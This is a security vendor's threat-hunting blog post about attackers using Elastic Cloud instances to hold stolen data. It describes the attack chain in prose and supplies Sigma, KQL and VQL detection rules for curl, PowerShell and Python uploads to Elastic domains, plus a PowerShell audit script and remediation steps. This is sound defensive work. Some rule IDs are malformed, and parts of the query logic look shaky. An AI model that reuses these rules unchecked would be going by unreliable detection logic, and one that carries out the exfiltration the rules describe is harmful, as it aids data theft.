Back to Intelligence

Elastic Cloud SIEM Abused for Data Exfiltration: Detection and Hunting Guide

SA
Security Arsenal Team
April 16, 2026
6 min read

Huntress researchers have uncovered a concerning campaign where threat actors actively leverage security vulnerabilities to exfiltrate sensitive data. What sets this campaign apart is the adversary's choice of infrastructure: they are utilizing Elastic Cloud SIEM and associated Elastic endpoints as a "data hub" to manage stolen information.

Instead of traditional Command-and-Control (C2) servers that are easily flagged by threat intelligence feeds, attackers are abusing legitimate cloud services. This "Living off the Land" (LotL) approach in the cloud allows them to blend in with legitimate administrative traffic, making detection significantly harder for organizations relying solely on IP-based blocklists. Defenders must immediately audit outbound traffic to cloud infrastructure and identify unauthorized data pipelines.

Technical Analysis

Affected Products & Platforms:

  • Infrastructure Abused: Elastic Cloud (Elasticsearch Service / Elastic Cloud Enterprise), specifically endpoints under *.elastic.co and *.es.elastic-cloud.com.
  • Victim Environments: Any organization where a security issue (unpatched vulnerability or credential compromise) has provided initial access, allowing the attacker to execute code or scripts capable of reaching the public internet.

Attack Chain & Exploitation Mechanism:

  1. Initial Access: The campaign begins with the exploitation of a security vulnerability (the specific CVE is currently being analyzed as part of the broader "security issue" research) or credential theft. This grants the attacker a foothold on a victim workstation or server.
  2. Data Staging: The attacker identifies sensitive data (credentials, configuration files, databases).
  3. Infrastructure Abuse: Rather than setting up a bespoke exfiltration server, the attacker utilizes a compromised or fraudulently provisioned Elastic Cloud instance.
  4. Exfiltration: Using agents (like curl, PowerShell, or Python) or compromised Elastic agents on the victim network, the stolen data is shipped directly to the attacker's Elastic Cloud instance. Elastic is used here not for security monitoring, but as a repository and management interface for the loot.

Exploitation Status:

  • Status: Confirmed active exploitation in the wild by Huntress researchers.
  • Classification: Data Exfiltration / Infrastructure Abuse.

Detection & Response

━━━ DETECTION CONTENT ━━━

SIGMA Rules

YAML
---
title: Potential Data Exfiltration to Elastic Cloud Infrastructure
id: 8a5b2c11-4d3e-4f8a-9c12-3d4a5e6f7g8h
status: experimental
description: Detects processes attempting to connect to known Elastic Cloud infrastructure, which may indicate abuse of Elastic services for data exfiltration or C2.
references:
 - https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
author: Security Arsenal
date: 2025/03/25
tags:
 - attack.exfiltration
 - attack.t1567.001
logsource:
 category: network_connection
 product: windows
detection:
 selection:
   DestinationHostname|contains:
     - '.elastic.co'
     - '.es.elastic-cloud.com'
 filter_main_legit_apps:
   Image|contains:
     - '\Program Files\Elastic\'
     - '\Program Files (x86)\Elastic\'
 filter_main_admin:
   User|contains:
     - 'ADMIN'
     - 'SYSTEM'
 condition: selection and not 1 of filter_main*
falsepositives:
  - Legitimate use of Elastic Cloud by administrators (rare on endpoints)
level: high
---
title: Suspicious CLI Upload to Elastic Cloud
description: Detects command-line tools like curl or PowerShell making web requests to Elastic Cloud endpoints, indicative of manual exfiltration scripts.
id: 9b6c3d22-5e4f-0g9h-1d2e-3f4a5b6c7d8e
status: experimental
author: Security Arsenal
date: 2025/03/25
references:
 - https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
tags:
 - attack.execution
 - attack.t1059.001
logsource:
 category: process_creation
 product: windows
detection:
 selection_tools:
   Image|endswith:
     - '\curl.exe'
     - '\powershell.exe'
     - '\python.exe'
 selection_cli:
   CommandLine|contains:
     - '.elastic.co'
     - '.es.elastic-cloud.com'
 condition: all of selection_*
falsepositives:
  - Administrator troubleshooting or legitimate DevOps scripts
level: medium


**KQL (Microsoft Sentinel / Defender)**
KQL — Microsoft Sentinel / Defender
// Hunt for outbound network connections to Elastic Cloud endpoints
// Excludes internal IPs and focuses on public egress
DeviceNetworkEvents
| where RemoteUrl has "elastic.co" or RemoteUrl has "es.elastic-cloud.com"
| where InitiatingProcessFileName !in ("elastic_agent.exe", "metricbeat.exe", "filebeat.exe", "logstash.exe")
| extend Timestamp = TimeGenerated, DeviceName = DeviceName, InitiatingUser = InitiatingProcessAccountName, RemoteIP = RemoteIP, RemoteURL = RemoteUrl
| project Timestamp, DeviceName, InitiatingUser, InitiatingProcessFileName, RemoteIP, RemoteURL, BytesSent, BytesReceived
| order by Timestamp desc


**Velociraptor VQL**
VQL — Velociraptor
-- Hunt for processes connecting to Elastic Cloud domains
SELECT chain.pid, chain.name, process.cmdline, process.username, chain.remote_address
FROM chain(pid=pid)
WHERE foreach(split(string=chain.remote_address, sep=":"), {
    // Check if remote address resolves to or contains Elastic domains
    // Note: This query assumes netstat data availability via chain()
    _val =~ "\.elastic\.co"
}) OR process.cmdline =~ "\.elastic\.co"


**Remediation Script (PowerShell)**
PowerShell
<#
.SYNOPSIS
    Identify and block unauthorized Elastic Cloud endpoints via Windows Firewall.
.DESCRIPTION
    This script checks for active connections to Elastic Cloud and creates a firewall rule to block them if they do not originate from approved administrative sources.
#>

$ElasticDomains = @("*.elastic.co", "*.es.elastic-cloud.com")
$LogPath = "$env:TEMP\ElasticCloudAudit.log"

# Get active TCP connections to Elastic domains
Write-Host "[+] Auditing active connections to Elastic Cloud infrastructure..."
$ActiveConnections = Get-NetTCPConnection | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess

$SuspiciousConnections = @()

foreach ($Conn in $ActiveConnections) {
    $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    if ($Process) {
        # Basic heuristic: Check if process path is NOT the official Elastic Agent directory
        # Adjust path as per your install location
        $LegitPath = "C:\Program Files\Elastic\"
        if ($Process.Path -notlike "$LegitPath*") {
             # Further check would require DNS resolution, here we flag non-standard processes
             if ($Conn.RemoteAddress -notlike "127.*" -and $Conn.RemoteAddress -notlike "10.*" -and $Conn.RemoteAddress -notlike "192.168.*") {
                $Details = [PSCustomObject]@{
                    ProcessName = $Process.ProcessName
                    PID = $Process.Id
                    Path = $Process.Path
                    RemoteIP = $Conn.RemoteAddress
                    RemotePort = $Conn.RemotePort
                    Timestamp = Get-Date
                }
                $SuspiciousConnections += $Details
             }
        }
    }
}

if ($SuspiciousConnections.Count -gt 0) {
    Write-Host "[!] Potential unauthorized Elastic Cloud connections found." -ForegroundColor Red
    $SuspiciousConnections | Format-Table -AutoSize
    $SuspiciousConnections | Out-File -FilePath $LogPath -Append
    Write-Host "[+] Log saved to $LogPath"

    # Warning: Implementing a block rule strictly requires thorough testing to avoid breaking legitimate apps.
    Write-Host "[!] Action Required: Review the log above. If traffic is confirmed malicious, block the specific RemoteIPs using firewall rules."
} else {
    Write-Host "[+] No obvious non-Elastic-agent connections found." -ForegroundColor Green
}

Remediation

  1. Identify and Isolate Compromised Assets:

    • Use the detection queries above to identify workstations or servers sending data to Elastic Cloud infrastructure that is not authorized by your IT/SecOps teams.
    • Isolate affected systems from the network immediately to prevent further data exfiltration.

  2. Revoke and Rotate Credentials:

    • Assume any credentials stored on the compromised systems are stolen. Force a password reset for all users with sessions on the affected machines.
    • If API keys or cloud tokens were present, revoke them immediately.

  3. Restrict Egress Traffic:

    • Firewall Rules: Implement strict egress filtering. Block access to *.elastic.co and *.es.elastic-cloud.com for all endpoints except known jump hosts or servers explicitly designated to run Elastic agents (e.g., your SIEM collectors).
    • Proxy Inspection: Ensure your web proxy inspects SSL/TLS traffic to identify connections attempting to bypass IP-based blocks using domain fronting (if applicable).

  4. Audit Elastic Cloud Instances:

    • If your organization uses Elastic Cloud, audit your instances for any new indices, users, or API keys created around the time of the compromise.
    • Check access logs for geo-locations or IP addresses that do not belong to your administrator workforce.

Related Resources

Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub

managed-socmdrsecurity-monitoringthreat-detectionsiemelastic-clouddata-exfiltrationthreat-hunting

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action